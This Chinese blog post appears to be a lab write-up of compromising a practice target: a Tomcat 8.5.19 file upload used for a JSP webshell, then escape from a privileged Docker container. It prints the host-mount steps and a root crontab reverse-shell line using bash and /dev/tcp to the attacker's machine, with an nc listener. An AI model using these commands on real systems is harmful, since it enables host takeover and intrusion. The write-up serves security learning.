记一次docker逃逸

最新推荐文章于 2024-07-11 15:35:38 发布
最新推荐文章于 2024-07-11 15:35:38 发布
阅读量31 收藏
点赞数
文章标签: docker 容器 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52922751/article/details/134306163
版权

靶场描述:

目标:192.168.21.28

攻击机:192.168.21.41

0x01 信息收集

端口扫描

利用namp进行端口服务、操作系统扫描

存在三个web页面。分别进行访问

目录扫描

目录扫描没有发现有用信息

0x02 漏洞验证

Tomcat8.5.19文件上传漏洞

利用burp suite抓包后验证

发现执行成功,尝试上传jsp木马

上传成功,利用哥斯拉进行连接

查看ip发现该服务器为内网服务器

0x03 Docker逃逸

利用ls -al /查看是否为docker,发现.dockerenv文件说明存在docker

利用命令cat /proc/self/status |grep Cap判断是否是以特权模式启动,出现0000003fffffffff说明是以特权模式启动

将主机挂载到docker中

fdisk -l #查看磁盘

mkdir /hacker #创建目录

mount /dev/sda1 /hacker #将主机挂载到目录下

在主机目录的/var/spool/cron/crontabs下创建计划任务列表,进行反弹shell

touch root

编辑root的内容

* * * * * bash -i >&/dev/tcp/攻击机IP/9999 0>&1

攻击机开启监听nc -lvvp 9999

成功获得宿主机权限

流星灬蝴蝶雨
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
一次Docker容器失败的逃逸
afei001
08-11 221
在授权渗透中碰到某客户搭建某开源漏洞环境。试试水,没想到这么菜😂!你这菜鸟,要你有何用。
一次Docker生产环境搭建的方法
09-30
主要介绍了一次Docker生产环境搭建的方法,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
一次docker逃逸学习
hongduilanjun的博客
03-23 4470
本文首发于先知社区:https://xz.aliyun.com/t/9966 一次docker逃逸拿shell的靶场渗透。 环境搭建 靶场: ubuntu 内网ip:192.168.183.10 外网ip:192.168.1.6 域内主机: win7:192.168.183.129 win2008:192.168.183.130 需手动开启ubuntu的docker环境,对应的端口服务如下 2001 struts2 2002 tomcat8 2003 phpmyadmin 4.8.1 外网打点 端
一次docker逃逸漏洞的复现
zkaqlaoniao的博客
10-07 160
公众号:掌控安全EDU 分享更多技术文章,欢迎关注一起探讨学习。
一次docker虚拟机横向移动渗透测试_docker 反向shell
2401_83621331的博客
04-21 1022
每隔一段时间,它就会更改 index.php 文件并调用它,似乎只要 heartbeat.sh 运行时 index.php 就会执行。获取root权限后,还是在docker容器里,利用最新的CVE-2022-0492进行docker容器逃逸。研究许久基本弄明白,zoiper是一个通信程序,最后四位数字是登录名,密码是2022年。我们将两者都传递给我们的机器,在wireshark中我们导入密钥并打开捕获的数据包;一旦我们上传它,我们调用 php 并在另一个容器中接收反向 shell;
一次简单的Docker逃逸+反编译jar接管云主机
hackzkaq的博客
11-08 216
Portainer常见的操作docker的图形化工具,轻量又好用,但是有不少Portainer存在弱口令,诸如:portainer/portainer;前期信息收集得知目标为SpringBoot框架,spring的配置文件都是yml和properties,linux直接查找指定后缀名的文件,未发现敏感信息。弱口令进入portainer之后,尝试挂载根目录进行逃逸失败,随即尝试特权模式进行Docker逃逸。随后翻到网站根目录,发现了不同文件夹下边有三个jar包,应该都打包成jar运行了。
一次Docker逃逸引起域控权限的丢失
xnxqwzy的博客
09-08 74
整个靶场环境一共五个靶机,分别位于三层网络环境中:网络拓扑如下:DMZ区IP段为192.168.1.0/24第二层网络环境IP段为192.168.52.1/24第三层网络环境IP段为192.168.93.1/24。
红队笔7--Web机器为Linux&&docker逃逸
huohaowen的博客
03-12 1196
对于这一次的vulstack靶场环境,还是比较真实的还原了企业内部的环境的(就web机器来说)其中遇到的问题也是比较贴切生活的,像用的Linux服务器,cs存在对应的限制,msf上线不成功,proxychains的摇曳等等等等,都是现实生活中会遇到的众多的问题,总之还是那句话学海无涯,学无止境,cease to live ,cease to struggle!!!
docker逃逸 从Play-with-Docker容器逃逸Docker主机
whatday的专栏
09-10 1941
导言 Play-with-Docker(PWD),即Docker的游乐场网站,专门供初学者迅速上手各种Docker命令。实际上,该网站是建立在许多Docker主机上的,每个主机运行多个供初学者使用的容器,所以,该网站是学习Docker的好去处。借助于PWD,人们可以在Web浏览器中免费体验Alpine Linux虚拟机,学生可以在Web浏览器中构建和运行Docker容器,这样,他们就可以直接体验...
一次docker虚拟机横向移动渗透测试
ALLEN'Blog
02-23 460
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
一次基于Docker的性能测试
03-23
背景 断断续续忙碌了几个月,终于自己写的开源项目算是有了雏形,打包成Dockerimage发布到AWSEC2后,写代码算是告一段落。随之而来的问题就是“我的项目能够支撑多少QPS”,由于用了Docker,即变成了“我的项目基于...
详细一次Docker部署服务的爬坑历程
01-11
第一次用docker正式在生产环境部署服务。从一个坑爬出来又掉入另一个坑。就录一下这次上线遇到的bug。写的不对的地方麻烦各位指正噢。见谅! 好啦。废话不多说。action! 本项目采用的是spring cloud+spring boot+...
Docker Push Docker Hub
w13511069150的博客
07-11 348
首先可以参考 Docker | 将自己的docker镜像推送到docker hub[图文详情]_如何将自己的docker镜像上传到dockerhub上-CSDN博客 将自己的镜像打标签 和 镜像推送到 docker hub上的图文注意一下1.打标签之前 docker tag paddleocr_fast_api:1.0 hmgx/wlx:3.02.打标签之后3.开始推送docker push hmgx/wlx:3.0 4.推送完成就可以在 docker hub上查看到了。
docker基础知识以及windows上的docker desktop 安装
最新发布
weixin_45747396的博客
07-11 905
我也不清楚啥意思,只管在cmd中下载了一个镜像,一直卡在那里,回去睡觉了,放在那里过了一夜之后,镜像没下载下来,但是docker可以正常运行了。需要拉下镜像— 将镜像文件从docker下载到本地----修改文件----创建新的docker镜像-----构建新的镜像----运行新镜像。从Registry下拉镜像,使用docker run来“解压缩”镜像,可获得一个可以运行的独立的环境和应用程序,即为容器。选一个基础操作系统和语言后,将对应的文件系统、依赖库、配置等打包为一个类似压缩包的文件,就是基础镜像。
Docker系列】Docker 镜像源:优化你的容器化开发流程
檀越的博客
07-06 1321
Docker 是一个开源的容器化平台,它允许开发者将应用及其依赖打包到一个轻量级、可移植的容器中,然后可以在任何支持 Docker 的机器上运行。Docker 镜像是容器化应用的基础,而镜像源是获取这些镜像的地方。选择合适的镜像源可以显著提高开发效率和应用部署的速度。本文将详细介绍 Docker 镜像源的概念、重要性以及如何管理和优化镜像源。
Gunicorn+Flask+Docker初体验
qq_40698086的博客
07-08 1221
Gunicorn 是一个 Python WSGI 服务器,可以用来部署 Python Web 应用程序。它提供了高性能、高可用性和灵活的配置选项。Flask 是一个轻量级的 Python Web 框架,提供了灵活的路由、模板引擎和请求对象等功能。它是构建 Web 应用程序的理想选择。Docker 是一个容器化的解决方案,允许开发者将应用程序和依赖项打包到一个容器中,然后在任何支持 Docker 的环境中运行。它提供了高效的开发、测试和部署体验。
Docker 入门篇(十 一)-- 网络配置总结
dazhong2012的专栏
07-06 588
Docker 网络允许容器进行相互通信以及与外部网络的连接。Bridge: 默认网络类型,Docker 安装时创建的 docker0 网桥,适用于单个宿主机上的容器互联。Host: 容器与宿主机共享网络栈,适用于需要容器与宿主机共享网络资源的场景。Overlay: 跨多个 Docker 守护进程的分布式网络,适用于容器跨宿主机通信。Macvlan: 为容器分配独立的 MAC 地址,使其可以直接连接到物理网络。
k8s docker逃逸
10-17
k8s docker逃逸是指攻击者通过容器内部的漏洞,从容器中逃脱并获取主机的控制权。这种攻击方式可以对整个集群造成严重的影响,因此需要采取一些措施来防止这种攻击。 一些防御措施包括: 1. 使用最小化的容器镜像,减少容器内部的漏洞。 2. 限制容器的权限,例如使用非特权用户运行容器。 3. 使用安全的网络策略,例如使用网络隔离和网络策略来限制容器之间的通信。 4. 定期更新和修补容器镜像和 Kubernetes 集群组件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值